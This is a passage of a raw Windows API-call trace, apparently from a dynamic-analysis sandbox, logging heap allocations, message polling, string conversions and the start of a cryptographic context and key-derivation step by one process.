[0264.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0264.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0264.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0264.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0264.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0264.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0264.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0264.842] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0264.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0264.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0264.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0264.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0264.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0264.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0264.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0264.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0264.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0264.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0264.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0264.842] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0264.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0264.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0264.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0264.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0264.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0264.843] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.843] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0264.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0264.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0264.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0264.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0264.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0264.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0264.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.843] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.843] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0264.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0264.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0264.843] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0264.843] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.844] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0264.844] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69b08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0264.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0264.844] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0264.844] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69888, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0264.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0264.844] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0264.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f146b0 [0264.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0264.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0264.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0264.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0264.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0264.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0264.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0264.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0264.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0264.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0264.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0264.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0264.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0264.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0264.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0264.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0264.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0264.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0264.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0264.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0264.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0264.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0264.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0264.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0264.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0264.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0264.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0264.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0264.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0264.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0264.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0264.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0264.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0264.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0264.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0264.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0264.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0264.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0264.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0264.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0264.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0264.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0264.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0264.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0264.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0264.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0264.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0264.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0264.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0264.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0264.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0264.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0264.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0264.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0264.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0264.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0264.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0264.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0264.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0264.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0264.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0264.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0264.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0264.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0264.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0264.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0264.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0264.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0264.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0264.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0264.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0264.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0264.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0264.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0264.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0264.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0264.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f148d8 [0264.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f146b0 | out: hHeap=0x970000) returned 1 [0264.848] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0264.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0264.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0264.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0264.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0264.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0264.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0264.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0264.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0264.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0264.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0264.848] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0264.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0264.848] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0264.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0264.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0264.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0264.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55038 [0264.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0264.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0264.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0264.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0264.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0264.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0264.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a60 [0264.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0264.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0264.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0264.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0264.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0264.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0264.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0264.849] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0264.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0264.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0264.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0264.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0264.849] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0264.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0264.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0264.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0264.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0264.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0264.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0264.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0264.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0264.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0264.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0264.850] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0264.850] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0264.850] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0264.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0264.850] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0264.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0264.850] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0264.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0264.850] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0264.851] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0264.851] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0264.851] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0264.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0264.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0264.851] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0264.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0264.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0264.851] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0264.853] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0264.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0264.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0264.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0264.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0264.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0264.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0264.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0264.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0264.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0264.854] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0264.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0264.854] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0264.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0264.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0264.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0264.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0264.854] 